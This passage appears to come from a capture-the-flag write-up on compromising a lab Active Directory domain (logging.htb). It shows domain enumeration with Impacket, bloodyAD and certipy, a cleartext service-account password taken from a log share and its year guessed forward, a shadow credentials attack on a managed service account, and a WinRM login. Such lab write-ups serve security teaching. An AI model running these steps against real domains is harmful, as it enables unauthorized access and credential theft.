| KVmPVmCAGrpAJdM9fa9Ziw803Ze21AQVOht8iNC6ftAtCAUp+kwhYDKsaJbE/4p0
| 5Gf3oJCRiDDGC70qCe5lQbnETp5z/VXxFwY5N6o40w4spe5/dpbBBouPlverLMnL
| ggLa2vSnOoig+rkgq/rtbzCRNsHNwjevvroWF0z9HoMYeiRmdzWizXYplp6yJ0na
| 2sQrQzc1nw0EB7Tz2Xpy0oZinrpyPWPaebLY/GoUQArzts6wJhYz7BpbdxFmAczV
| VEEZwIPWlVTVfoPN6ybmhZlBdGui27W/2MRnXCy4KH1KRV699xGp0Qr/Q9erU0WP
| zRpq333BIbPxpFCqCISXz7lLt8aPsFHVFIWbPxcOQKKQlbHiQ4qVXmWgoX5LWwGA
| W3lntXUi9xf6JwdVDbgZsH5OWg4AV2giU6TEK5JjGeRsINqQCgYndXKQCqp7t4zR
| AbML7iOTse0IauL5X6UZBbJJ/V7XIkE6WDoPFFpJe2sXxg98PieDxT9914JRmNx8
| 9CFyLB6fNC6nzgq8+Wa/5/rXhjIS7pSaYMs8umNigTcFJ2HJC0zOUEMqkGpOxEH/
| Zm+AYG+tg0f3xdFqr0MdcbUJ7TPUMheEqLEgdCsPWFbIVlsPZsXW8hjWbcEq90Hn
| POF4wwAV8i3dVFrslgw7SnFZOfY=
|_-----END CERTIFICATE-----
|_ssl-date: 2026-04-19T10:14:14+00:00; +6h59m48s from scanner time.
| tls-alpn: 
|   h2
|_  http/1.1
9389/tcp  open   mc-nmf        syn-ack ttl 127 .NET Message Framing
15518/tcp closed unknown       reset ttl 127
25677/tcp closed unknown       reset ttl 127
32678/tcp closed unknown       reset ttl 127
32864/tcp closed unknown       reset ttl 127
47001/tcp open   http          syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
47363/tcp closed unknown       reset ttl 127
49664/tcp open   msrpc         syn-ack ttl 127 Microsoft Windows RPC
49665/tcp open   msrpc         syn-ack ttl 127 Microsoft Windows RPC
49666/tcp open   msrpc         syn-ack ttl 127 Microsoft Windows RPC
49667/tcp open   msrpc         syn-ack ttl 127 Microsoft Windows RPC
49671/tcp open   msrpc         syn-ack ttl 127 Microsoft Windows RPC
49686/tcp open   ncacn_http    syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
49687/tcp open   msrpc         syn-ack ttl 127 Microsoft Windows RPC
49690/tcp open   msrpc         syn-ack ttl 127 Microsoft Windows RPC
49691/tcp open   msrpc         syn-ack ttl 127 Microsoft Windows RPC
49713/tcp open   msrpc         syn-ack ttl 127 Microsoft Windows RPC
49719/tcp open   msrpc         syn-ack ttl 127 Microsoft Windows RPC
49746/tcp open   msrpc         syn-ack ttl 127 Microsoft Windows RPC
49776/tcp open   msrpc         syn-ack ttl 127 Microsoft Windows RPC
55515/tcp closed unknown       reset ttl 127
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time: 
|   date: 2026-04-19T10:14:03
|_  start_date: N/A
| p2p-conficker: 
|   Checking for Conficker.C or higher...
|   Check 1 (port 60761/tcp): CLEAN (Couldn't connect)
|   Check 2 (port 50348/tcp): CLEAN (Couldn't connect)
|   Check 3 (port 33017/udp): CLEAN (Timeout)
|   Check 4 (port 59572/udp): CLEAN (Failed to receive data)
|_  0/4 checks are positive: Host is CLEAN or ports are blocked
|_clock-skew: mean: 6h59m47s, deviation: 0s, median: 6h59m47s
| smb2-security-mode: 
|   3.1.1: 
|_    Message signing enabled and required

We can see from the scan several open ports from the common AD services: SMB,LDAP,RPC,Kerberos, WinRM including the presence of a CA indicating ADCS, as well as several uncommon services including: IIS, WSUS

Port 80 - IIS

Visiting the sebserver on port 80 we’re just greeted with the default microsoft IIS page. I was unable to find anything when fuzzing for subdomains through vhost fuzzing. The same applies to fuzzing directories.

For the following sections I’ll get myself a TGT from our assumed breach user and use that to authenticate.

1
2
3
4
5
$ getTGT.py 'logging.htb/wallace.everette:Welcome2026@'
Impacket v0.14.0.dev0+20260406.132546.b12b2f3b - Copyright Fortra, LLC and its affiliated companies 

[*] Saving ticket in wallace.everette.ccache
$ export KRB5CCNAME=wallace.everette.ccache

Let’s start by enumerating the domain.

Domain Users

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
$ GetADUsers.py -k -no-pass logging.htb/ -all    
Impacket v0.14.0.dev0+20260406.132546.b12b2f3b - Copyright Fortra, LLC and its affiliated companies 

[*] Getting machine hostname
[*] Querying DC01 for information about domain.
Name                  Email                           PasswordLastSet      LastLogon           
--------------------  ------------------------------  -------------------  -------------------
Administrator                                         2026-04-16 10:41:53.344270  2026-04-19 06:31:32.086826 
Guest                                                 <never>              <never>             
krbtgt                                                2026-04-16 10:47:15.391024  <never>             
svc_recovery                                          2026-04-16 19:09:49.415051  <never>             
jaylee.clifton                                        2026-04-16 19:09:49.774441  2026-04-19 06:32:15.867776 
monique.chip                                          2026-04-16 19:09:49.949785  <never>             
kyson.abel                                            2026-04-16 19:09:50.071726  <never>             
fable.milford                                         2026-04-16 19:09:50.149426  <never>             
wellington.kylan                                      2026-04-16 19:09:50.227559  <never>             
serina.philander                                      2026-04-16 19:09:50.383931  <never>             
wallace.everette                                      2026-04-16 19:09:50.493177  2026-04-19 06:25:30.305323 
toby.brynleigh                                        2026-04-16 19:09:50.571309  2026-04-19 04:12:53.789676 

Domain Computers

1
2
3
4
5
6
7
8
$ GetADComputers.py -k -no-pass logging.htb/     
Impacket v0.14.0.dev0+20260406.132546.b12b2f3b - Copyright Fortra, LLC and its affiliated companies 

[*] Getting machine hostname
[*] Querying DC01 for information about domain.
SAM AcctName     DNS Hostname                         OS Version       OS                   
---------------  -----------------------------------  ---------------  --------------------
DC01$            DC01.logging.htb                     10.0 (17763)     Windows Server 2019 Standard 

Ldap Status

1
2
3
4
5
6
7
8
$ CheckLDAPStatus.py -domain logging.htb -dc-ip 10.129.28.191 
Impacket v0.14.0.dev0+20260406.132546.b12b2f3b - Copyright Fortra, LLC and its affiliated companies 

[*] Targeted domain: logging.htb
[*] Found 1 domain controller(s) in logging.htb
Hostname: dc01.logging.htb
        > LDAP Signing Required: False
        > LDAPS Channel Binding Status: Never

Domain Groups and Members

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
$ bloodyAD -H dc01.logging.htb -k -d logging.htb get search --filter '(objectClass=Group)' --attr member

distinguishedName: CN=Administrators,CN=Builtin,DC=logging,DC=htb
member: CN=toby.brynleigh,CN=Users,DC=logging,DC=htb; CN=Domain Admins,CN=Users,DC=logging,DC=htb; CN=Enterprise Admins,CN=Users,DC=logging,DC=htb; CN=Administrator,CN=Users,DC=logging,DC=htb

distinguishedName: CN=Users,CN=Builtin,DC=logging,DC=htb
member: CN=Domain Users,CN=Users,DC=logging,DC=htb; CN=S-1-5-11,CN=ForeignSecurityPrincipals,DC=logging,DC=htb; CN=S-1-5-4,CN=ForeignSecurityPrincipals,DC=logging,DC=htb

distinguishedName: CN=Guests,CN=Builtin,DC=logging,DC=htb
member: CN=Domain Guests,CN=Users,DC=logging,DC=htb; CN=Guest,CN=Users,DC=logging,DC=htb

distinguishedName: CN=Print Operators,CN=Builtin,DC=logging,DC=htb

distinguishedName: CN=Backup Operators,CN=Builtin,DC=logging,DC=htb

distinguishedName: CN=Replicator,CN=Builtin,DC=logging,DC=htb

distinguishedName: CN=Remote Desktop Users,CN=Builtin,DC=logging,DC=htb

distinguishedName: CN=Network Configuration Operators,CN=Builtin,DC=logging,DC=htb

distinguishedName: CN=Performance Monitor Users,CN=Builtin,DC=logging,DC=htb

distinguishedName: CN=Performance Log Users,CN=Builtin,DC=logging,DC=htb
member: CN=jaylee.clifton,CN=Users,DC=logging,DC=htb

distinguishedName: CN=Distributed COM Users,CN=Builtin,DC=logging,DC=htb

distinguishedName: CN=IIS_IUSRS,CN=Builtin,DC=logging,DC=htb

distinguishedName: CN=Cryptographic Operators,CN=Builtin,DC=logging,DC=htb

distinguishedName: CN=Event Log Readers,CN=Builtin,DC=logging,DC=htb

distinguishedName: CN=Certificate Service DCOM Access,CN=Builtin,DC=logging,DC=htb
member: CN=S-1-5-11,CN=ForeignSecurityPrincipals,DC=logging,DC=htb

distinguishedName: CN=RDS Remote Access Servers,CN=Builtin,DC=logging,DC=htb

distinguishedName: CN=RDS Endpoint Servers,CN=Builtin,DC=logging,DC=htb

distinguishedName: CN=RDS Management Servers,CN=Builtin,DC=logging,DC=htb

distinguishedName: CN=Hyper-V Administrators,CN=Builtin,DC=logging,DC=htb

distinguishedName: CN=Access Control Assistance Operators,CN=Builtin,DC=logging,DC=htb

distinguishedName: CN=Remote Management Users,CN=Builtin,DC=logging,DC=htb
member: CN=msa_health,CN=Managed Service Accounts,DC=logging,DC=htb

distinguishedName: CN=Storage Replica Administrators,CN=Builtin,DC=logging,DC=htb

distinguishedName: CN=Domain Computers,CN=Users,DC=logging,DC=htb

distinguishedName: CN=Domain Controllers,CN=Users,DC=logging,DC=htb

distinguishedName: CN=Schema Admins,CN=Users,DC=logging,DC=htb
member: CN=Administrator,CN=Users,DC=logging,DC=htb

distinguishedName: CN=Enterprise Admins,CN=Users,DC=logging,DC=htb
member: CN=Administrator,CN=Users,DC=logging,DC=htb

distinguishedName: CN=Cert Publishers,CN=Users,DC=logging,DC=htb
member: CN=DC01,OU=Domain Controllers,DC=logging,DC=htb

distinguishedName: CN=Domain Admins,CN=Users,DC=logging,DC=htb
member: CN=toby.brynleigh,CN=Users,DC=logging,DC=htb; CN=Administrator,CN=Users,DC=logging,DC=htb

distinguishedName: CN=Domain Users,CN=Users,DC=logging,DC=htb

distinguishedName: CN=Domain Guests,CN=Users,DC=logging,DC=htb

distinguishedName: CN=Group Policy Creator Owners,CN=Users,DC=logging,DC=htb
member: CN=Administrator,CN=Users,DC=logging,DC=htb

distinguishedName: CN=RAS and IAS Servers,CN=Users,DC=logging,DC=htb

distinguishedName: CN=Server Operators,CN=Builtin,DC=logging,DC=htb

distinguishedName: CN=Account Operators,CN=Builtin,DC=logging,DC=htb

distinguishedName: CN=Pre-Windows 2000 Compatible Access,CN=Builtin,DC=logging,DC=htb
member: CN=DC01,OU=Domain Controllers,DC=logging,DC=htb; CN=S-1-5-11,CN=ForeignSecurityPrincipals,DC=logging,DC=htb

distinguishedName: CN=Incoming Forest Trust Builders,CN=Builtin,DC=logging,DC=htb

distinguishedName: CN=Windows Authorization Access Group,CN=Builtin,DC=logging,DC=htb
member: CN=S-1-5-9,CN=ForeignSecurityPrincipals,DC=logging,DC=htb

distinguishedName: CN=Terminal Server License Servers,CN=Builtin,DC=logging,DC=htb

distinguishedName: CN=Allowed RODC Password Replication Group,CN=Users,DC=logging,DC=htb

distinguishedName: CN=Denied RODC Password Replication Group,CN=Users,DC=logging,DC=htb
member: CN=Read-only Domain Controllers,CN=Users,DC=logging,DC=htb; CN=Group Policy Creator Owners,CN=Users,DC=logging,DC=htb; CN=Domain Admins,CN=Users,DC=logging,DC=htb; CN=Cert Publishers,CN=Users,DC=logging,DC=htb; CN=Enterprise Admins,CN=Users,DC=logging,DC=htb; CN=Schema Admins,CN=Users,DC=logging,DC=htb; CN=Domain Controllers,CN=Users,DC=logging,DC=htb; CN=krbtgt,CN=Users,DC=logging,DC=htb

distinguishedName: CN=Read-only Domain Controllers,CN=Users,DC=logging,DC=htb

distinguishedName: CN=Enterprise Read-only Domain Controllers,CN=Users,DC=logging,DC=htb

distinguishedName: CN=Cloneable Domain Controllers,CN=Users,DC=logging,DC=htb

distinguishedName: CN=Protected Users,CN=Users,DC=logging,DC=htb
member: CN=svc_recovery,CN=Users,DC=logging,DC=htb; CN=Administrator,CN=Users,DC=logging,DC=htb

distinguishedName: CN=Key Admins,CN=Users,DC=logging,DC=htb

distinguishedName: CN=Enterprise Key Admins,CN=Users,DC=logging,DC=htb

distinguishedName: CN=DnsAdmins,CN=Users,DC=logging,DC=htb

distinguishedName: CN=DnsUpdateProxy,CN=Users,DC=logging,DC=htb

distinguishedName: CN=Emergency Recovery,CN=Users,DC=logging,DC=htb
member: CN=svc_recovery,CN=Users,DC=logging,DC=htb

distinguishedName: CN=IT,CN=Users,DC=logging,DC=htb
member: CN=jaylee.clifton,CN=Users,DC=logging,DC=htb

distinguishedName: CN=HR,CN=Users,DC=logging,DC=htb
member: CN=wellington.kylan,CN=Users,DC=logging,DC=htb

distinguishedName: CN=WSUS Administrators,CN=Users,DC=logging,DC=htb

distinguishedName: CN=WSUS Reporters,CN=Users,DC=logging,DC=htb

Managed Service Accounts

1
2
3
$ bloodyAD -H dc01.logging.htb -k -d logging.htb get search --filter '(objectClass=msDS-GroupManagedServiceAccount)' --attr distinguishedName

distinguishedName: CN=msa_health,CN=Managed Service Accounts,DC=logging,DC=htb

Vulnerable Certificates

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
$ certipy-ad find -k -no-pass -target DC01.logging.htb -vulnerable
Certipy v5.0.4 - by Oliver Lyak (ly4k)

[!] DNS resolution failed: The DNS query name does not exist: DC01.logging.htb.
[!] Use -debug to print a stacktrace
[*] Finding certificate templates
[*] Found 34 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 12 enabled certificate templates
[*] Finding issuance policies
[*] Found 15 issuance policies
[*] Found 0 OIDs linked to templates
[*] Retrieving CA configuration for 'logging-DC01-CA' via RRP
[*] Successfully retrieved CA configuration for 'logging-DC01-CA'
[*] Checking web enrollment for CA 'logging-DC01-CA' @ 'DC01.logging.htb'
[!] Error checking web enrollment: [Errno 111] Connection refused
[!] Use -debug to print a stacktrace
[*] Saving text output to '20260419064303_Certipy.txt'
[*] Wrote text output to '20260419064303_Certipy.txt'
[*] Saving JSON output to '20260419064303_Certipy.json'
[*] Wrote JSON output to '20260419064303_Certipy.json'

$ cat 20260419064303_Certipy.txt                                  
Certificate Authorities
  0
    CA Name                             : logging-DC01-CA
    DNS Name                            : DC01.logging.htb
    Certificate Subject                 : CN=logging-DC01-CA, DC=logging, DC=htb
    Certificate Serial Number           : 196621CCC95B9C904E63B58E449ABC04
    Certificate Validity Start          : 2026-04-17 03:20:00+00:00
    Certificate Validity End            : 2126-04-17 03:30:00+00:00
    Web Enrollment
      HTTP
        Enabled                         : False
      HTTPS
        Enabled                         : False
    User Specified SAN                  : Disabled
    Request Disposition                 : Issue
    Enforce Encryption for Requests     : Enabled
    Active Policy                       : CertificateAuthority_MicrosoftDefault.Policy
    Permissions
      Owner                             : LOGGING.HTB\Administrators
      Access Rights
        ManageCa                        : LOGGING.HTB\Administrators
                                          LOGGING.HTB\Domain Admins
                                          LOGGING.HTB\Enterprise Admins
        ManageCertificates              : LOGGING.HTB\Administrators
                                          LOGGING.HTB\Domain Admins
                                          LOGGING.HTB\Enterprise Admins
        Enroll                          : LOGGING.HTB\Authenticated Users
Certificate Templates                   : [!] Could not find any certificate templates

Shares

1
2
3
4
5
6
7
8
9
10
11
12
$ smbclient.py -k -no-pass DC01.logging.htb       
Impacket v0.14.0.dev0+20260406.132546.b12b2f3b - Copyright Fortra, LLC and its affiliated companies 

Type help for list of commands
# shares
ADMIN$
C$
IPC$
Logs
NETLOGON
SYSVOL
WSUSTemp

User

Establishing a Target

The most interesting object I have found so far seems to be the msa_health$ service account along with the svc_recovery and Emergency Recovery groups.

Let’s take a look at the ACLs for msa_health$

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
$ bloodyAD -H dc01.logging.htb -k -d logging.htb get object 'msa_health$' --resolve-sd

distinguishedName: CN=msa_health,CN=Managed Service Accounts,DC=logging,DC=htb
accountExpires: 9999-12-31 23:59:59.999999+00:00
badPasswordTime: 1601-01-01 00:00:00+00:00
badPwdCount: 0
cn: msa_health
codePage: 0
countryCode: 0
dNSHostName: msa_health.logging.htb
dSCorePropagationData: 2026-04-16 23:36:35+00:00
instanceType: 4
isCriticalSystemObject: False
lastLogoff: 1601-01-01 00:00:00+00:00
lastLogon: 1601-01-01 00:00:00+00:00
localPolicyFlags: 0
logonCount: 0
memberOf: CN=Remote Management Users,CN=Builtin,DC=logging,DC=htb
msDS-ManagedPasswordId: AQAAAEtEU0sCAAAAbAEAAAIAAAABAAAABtA80N8pE5wgJbudpD4KkgAAAAAYAAAAGAAAAGwAbwBnAGcAaQBuAGcALgBoAHQAYgAAAGwAbwBnAGcAaQBuAGcALgBoAHQAYgAAAA==
msDS-ManagedPasswordInterval: 30
msDS-SupportedEncryptionTypes: 28
nTSecurityDescriptor.Owner: Domain Admins
nTSecurityDescriptor.Control: DACL_AUTO_INHERITED|DACL_PRESENT|SACL_AUTO_INHERITED|SELF_RELATIVE
nTSecurityDescriptor.ACL.0.Type: == DENIED_OBJECT ==
nTSecurityDescriptor.ACL.0.Trustee: EVERYONE
nTSecurityDescriptor.ACL.0.Right: CONTROL_ACCESS
nTSecurityDescriptor.ACL.0.ObjectType: User-Force-Change-Password
nTSecurityDescriptor.ACL.1.Type: == ALLOWED_OBJECT ==
nTSecurityDescriptor.ACL.1.Trustee: Cert Publishers
nTSecurityDescriptor.ACL.1.Right: WRITE_PROP|READ_PROP
nTSecurityDescriptor.ACL.1.ObjectType: X509-Cert
nTSecurityDescriptor.ACL.2.Type: == ALLOWED_OBJECT ==
nTSecurityDescriptor.ACL.2.Trustee: WINDOWS_AUTHORIZATION_ACCESS_GROUP
nTSecurityDescriptor.ACL.2.Right: READ_PROP
nTSecurityDescriptor.ACL.2.ObjectType: Token-Groups-Global-And-Universal
nTSecurityDescriptor.ACL.3.Type: == ALLOWED_OBJECT ==
nTSecurityDescriptor.ACL.3.Trustee: PRINCIPAL_SELF
nTSecurityDescriptor.ACL.3.Right: WRITE_VALIDATED
nTSecurityDescriptor.ACL.3.ObjectType: Service-Principal-Name; DNS-Host-Name
+ nTSecurityDescriptor.ACL.4.Type: == ALLOWED_OBJECT ==
+ nTSecurityDescriptor.ACL.4.Trustee: EVERYONE
+ nTSecurityDescriptor.ACL.4.Right: READ_PROP
+ nTSecurityDescriptor.ACL.4.ObjectType: ms-DS-ManagedPassword
nTSecurityDescriptor.ACL.5.Type: == ALLOWED_OBJECT ==
nTSecurityDescriptor.ACL.5.Trustee: PRINCIPAL_SELF
nTSecurityDescriptor.ACL.5.Right: WRITE_PROP|READ_PROP
nTSecurityDescriptor.ACL.5.ObjectType: Personal-Information (property set)
+ nTSecurityDescriptor.ACL.6.Type: == ALLOWED ==
+ nTSecurityDescriptor.ACL.6.Trustee: svc_recovery
+ nTSecurityDescriptor.ACL.6.Right: GENERIC_WRITE|READ_PROP|LIST_CHILD
+ nTSecurityDescriptor.ACL.6.ObjectType: Self
nTSecurityDescriptor.ACL.7.Type: == ALLOWED ==
nTSecurityDescriptor.ACL.7.Trustee: ACCOUNT_OPERATORS; LOCAL_SYSTEM; Domain Admins
nTSecurityDescriptor.ACL.7.Right: GENERIC_ALL
nTSecurityDescriptor.ACL.7.ObjectType: Self
nTSecurityDescriptor.ACL.8.Type: == ALLOWED ==
nTSecurityDescriptor.ACL.8.Trustee: AUTHENTICATED_USERS
nTSecurityDescriptor.ACL.8.Right: GENERIC_READ
nTSecurityDescriptor.ACL.8.ObjectType: Self
nTSecurityDescriptor.ACL.9.Type: == ALLOWED_OBJECT ==
nTSecurityDescriptor.ACL.9.Trustee: ALIAS_PREW2KCOMPACC
nTSecurityDescriptor.ACL.9.Right: READ_PROP
nTSecurityDescriptor.ACL.9.ObjectType: Logon-Information (property set); Remote-Access-Information (property set); General-Information (property set); Account-Restrictions (property set); Group-Membership (property set)
nTSecurityDescriptor.ACL.9.InheritedObjectType: User; inetOrgPerson
nTSecurityDescriptor.ACL.9.Flags: CONTAINER_INHERIT; INHERIT_ONLY; INHERITED
nTSecurityDescriptor.ACL.10.Type: == ALLOWED_OBJECT ==
nTSecurityDescriptor.ACL.10.Trustee: Enterprise Key Admins; Key Admins
nTSecurityDescriptor.ACL.10.Right: WRITE_PROP|READ_PROP
nTSecurityDescriptor.ACL.10.ObjectType: ms-DS-Key-Credential-Link
nTSecurityDescriptor.ACL.10.Flags: CONTAINER_INHERIT; INHERITED
nTSecurityDescriptor.ACL.11.Type: == ALLOWED_OBJECT ==
nTSecurityDescriptor.ACL.11.Trustee: PRINCIPAL_SELF; CREATOR_OWNER
nTSecurityDescriptor.ACL.11.Right: WRITE_VALIDATED
nTSecurityDescriptor.ACL.11.ObjectType: DS-Validated-Write-Computer
nTSecurityDescriptor.ACL.11.InheritedObjectType: Computer
nTSecurityDescriptor.ACL.11.Flags: CONTAINER_INHERIT; INHERIT_ONLY; INHERITED
nTSecurityDescriptor.ACL.12.Type: == ALLOWED_OBJECT ==
nTSecurityDescriptor.ACL.12.Trustee: ENTERPRISE_DOMAIN_CONTROLLERS
nTSecurityDescriptor.ACL.12.Right: READ_PROP
nTSecurityDescriptor.ACL.12.ObjectType: Token-Groups
nTSecurityDescriptor.ACL.12.InheritedObjectType: Group; User; Computer
nTSecurityDescriptor.ACL.12.Flags: CONTAINER_INHERIT; INHERIT_ONLY; INHERITED
nTSecurityDescriptor.ACL.13.Type: == ALLOWED_OBJECT ==
nTSecurityDescriptor.ACL.13.Trustee: PRINCIPAL_SELF
nTSecurityDescriptor.ACL.13.Right: WRITE_PROP
nTSecurityDescriptor.ACL.13.ObjectType: ms-TPM-Tpm-Information-For-Computer
nTSecurityDescriptor.ACL.13.InheritedObjectType: Computer
nTSecurityDescriptor.ACL.13.Flags: CONTAINER_INHERIT; INHERIT_ONLY; INHERITED
nTSecurityDescriptor.ACL.14.Type: == ALLOWED_OBJECT ==
nTSecurityDescriptor.ACL.14.Trustee: ALIAS_PREW2KCOMPACC
nTSecurityDescriptor.ACL.14.Right: GENERIC_READ
nTSecurityDescriptor.ACL.14.ObjectType: Self
nTSecurityDescriptor.ACL.14.InheritedObjectType: User; inetOrgPerson; Group
nTSecurityDescriptor.ACL.14.Flags: CONTAINER_INHERIT; INHERIT_ONLY; INHERITED
nTSecurityDescriptor.ACL.15.Type: == ALLOWED_OBJECT ==
nTSecurityDescriptor.ACL.15.Trustee: PRINCIPAL_SELF
nTSecurityDescriptor.ACL.15.Right: WRITE_PROP|READ_PROP
nTSecurityDescriptor.ACL.15.ObjectType: ms-DS-Allowed-To-Act-On-Behalf-Of-Other-Identity
nTSecurityDescriptor.ACL.15.Flags: CONTAINER_INHERIT; INHERITED; OBJECT_INHERIT
nTSecurityDescriptor.ACL.16.Type: == ALLOWED_OBJECT ==
nTSecurityDescriptor.ACL.16.Trustee: PRINCIPAL_SELF
nTSecurityDescriptor.ACL.16.Right: CONTROL_ACCESS|WRITE_PROP|READ_PROP
nTSecurityDescriptor.ACL.16.ObjectType: Private-Information (property set)
nTSecurityDescriptor.ACL.16.Flags: CONTAINER_INHERIT; INHERITED
nTSecurityDescriptor.ACL.17.Type: == ALLOWED ==
nTSecurityDescriptor.ACL.17.Trustee: Enterprise Admins
nTSecurityDescriptor.ACL.17.Right: GENERIC_ALL
nTSecurityDescriptor.ACL.17.ObjectType: Self
nTSecurityDescriptor.ACL.17.Flags: CONTAINER_INHERIT; INHERITED
nTSecurityDescriptor.ACL.18.Type: == ALLOWED ==
nTSecurityDescriptor.ACL.18.Trustee: ALIAS_PREW2KCOMPACC
nTSecurityDescriptor.ACL.18.Right: LIST_CHILD
nTSecurityDescriptor.ACL.18.ObjectType: Self
nTSecurityDescriptor.ACL.18.Flags: CONTAINER_INHERIT; INHERITED
nTSecurityDescriptor.ACL.19.Type: == ALLOWED ==
nTSecurityDescriptor.ACL.19.Trustee: BUILTIN_ADMINISTRATORS
nTSecurityDescriptor.ACL.19.Right: WRITE_OWNER|WRITE_DACL|GENERIC_READ|DELETE|CONTROL_ACCESS|WRITE_PROP|WRITE_VALIDATED|CREATE_CHILD
nTSecurityDescriptor.ACL.19.ObjectType: Self
nTSecurityDescriptor.ACL.19.Flags: CONTAINER_INHERIT; INHERITED
name: msa_health
objectCategory: CN=ms-DS-Group-Managed-Service-Account,CN=Schema,CN=Configuration,DC=logging,DC=htb
objectClass: top; person; organizationalPerson; user; computer; msDS-GroupManagedServiceAccount
objectGUID: 22d835ba-1d5a-4a18-bd09-56225643b724
objectSid: S-1-5-21-4020823815-2796529489-1682170552-2113
primaryGroupID: 515
pwdLastSet: 2026-04-16 23:36:06.647754+00:00
sAMAccountName: msa_health$
sAMAccountType: 805306369
uSNChanged: 24616
uSNCreated: 24609
userAccountControl: WORKSTATION_TRUST_ACCOUNT
whenChanged: 2026-04-16 23:36:35+00:00
whenCreated: 2026-04-16 23:36:06+00:00

Although it may look like everyone can read the msDS-ManagedPassword, in reality only users with GENERIC ALL over the machine can read this property, so our target shifts over to svc_recovery.

svc_recovery cleartext password

Looking back at our shares we can find 2 interesting ones: Logs and WSUSTemp, WSUSTemp seems like the most appealing right now because it opens up the possibility for WSUS attacks, however we don’t have permissions on this share, so instead we take a look at the Logs share.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
# use WSUSTemp
[-] SMB SessionError: code: 0xc0000022 - STATUS_ACCESS_DENIED - {Access Denied} A process has requested access to an object but has not been granted those access rights.
# use Logs
# ls
drw-rw-rw-          0  Thu Apr 16 19:10:09 2026 .
drw-rw-rw-          0  Thu Apr 16 19:10:09 2026 ..
-rw-rw-rw-       1294  Thu Apr 16 19:10:09 2026 Audit_Heartbeat.log
-rw-rw-rw-       8488  Thu Apr 16 19:10:09 2026 IdentitySync_Trace_20260219.log
-rw-rw-rw-        468  Thu Apr 16 19:10:09 2026 Service_State.log
-rw-rw-rw-       1170  Thu Apr 16 19:10:09 2026 TaskMonitor.log
# mget *
[*] Downloading Audit_Heartbeat.log
[*] Downloading IdentitySync_Trace_20260219.log
[*] Downloading Service_State.log
[*] Downloading TaskMonitor.log

Taking a look at each log, the most interesting one seems to be the IdentitySync_Trace_20260219.log where we can find a cleartext password for the user account svc_recovery.

1
2
3
$ grep -ni 'svc_recovery' IdentitySync_Trace_20260219.log 
32:[2026-02-09 03:00:03.125] [PID:4102] [Thread:04] VERBOSE - ConnectionContext Dump: { Domain: "logging.htb", Server: "DC01", SSL: "False", BindUser: "LOGGING\svc_recovery", BindPass: "Em3rg3ncyPa$$2025", Timeout: 30 }
41:[2026-02-19 03:00:03.510] [PID:4102] [Thread:12] WARN  - Connectivity failed for logging\svc_recovery. Checking alternate Domain Controller...

I’ve tried this password against svc_recovery, however it didn’t work as expected, as it’s no longer the year 2025, one may suspect to update the year to 2026 which is in the end what worked.

for the following sections I’ll get myself a TGT as svc_recovery to use for authentication

1
2
3
4
5
$ getTGT.py logging.htb/svc_recovery:'Em3rg3ncyPa$$2026'                     
Impacket v0.14.0.dev0+20260406.132546.b12b2f3b - Copyright Fortra, LLC and its affiliated companies 

[*] Saving ticket in svc_recovery.ccache
$ export KRB5CCNAME=svc_recovery.ccache 

Shadowing MSA_HEALTH$

Now that we have svc_recovery I’ll grab msa_health$’s TGT through a shadow credentials attack

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
$ certipy-ad shadow add -k -no-pass -target DC01.logging.htb -account 'msa_health$' 
Certipy v5.0.4 - by Oliver Lyak (ly4k)

[!] DC host (-dc-host) not specified and Kerberos authentication is used. This might fail
[!] DNS resolution failed: The DNS query name does not exist: DC01.logging.htb.
[!] Use -debug to print a stacktrace
[!] DNS resolution failed: The DNS query name does not exist: LOGGING.HTB.
[!] Use -debug to print a stacktrace
[*] Targeting user 'msa_health$'
[*] Generating certificate
[*] Certificate generated
[*] Generating Key Credential
[*] Key Credential generated with DeviceID 'b2a0a7d82a184a60ad45314647dc2fa3'
[*] Adding Key Credential with device ID 'b2a0a7d82a184a60ad45314647dc2fa3' to the Key Credentials for 'msa_health$'
[*] Successfully added Key Credential with device ID 'b2a0a7d82a184a60ad45314647dc2fa3' to the Key Credentials for 'msa_health$'
[*] Saving certificate and private key to 'msa_health.pfx'
[*] Saved certificate and private key to 'msa_health.pfx'

$ gettgtpkinit.py -cert-pfx msa_health.pfx 'logging.htb/msa_health' msa_health.ccache
2026-04-19 08:25:29,037 minikerberos INFO     Loading certificate and key from file
2026-04-19 08:25:29,197 minikerberos INFO     Requesting TGT
2026-04-19 08:25:29,798 minikerberos INFO     AS-REP encryption key (you might need this later):
2026-04-19 08:25:29,798 minikerberos INFO     a9948404a43cf046703d230c84e858ec9e92568b2c6db575846de3b35d14b793
2026-04-19 08:25:29,804 minikerberos INFO     Saved TGT to file

$ export KRB5CCNAME=msa_health.ccache

Since we know that msa_health is a member of Remote Management Users we’re able to remote onto the machine.

1
2
3
4
5
6
7
8
9
10
$ evil-winrm -i dc01.logging.htb -r logging.htb
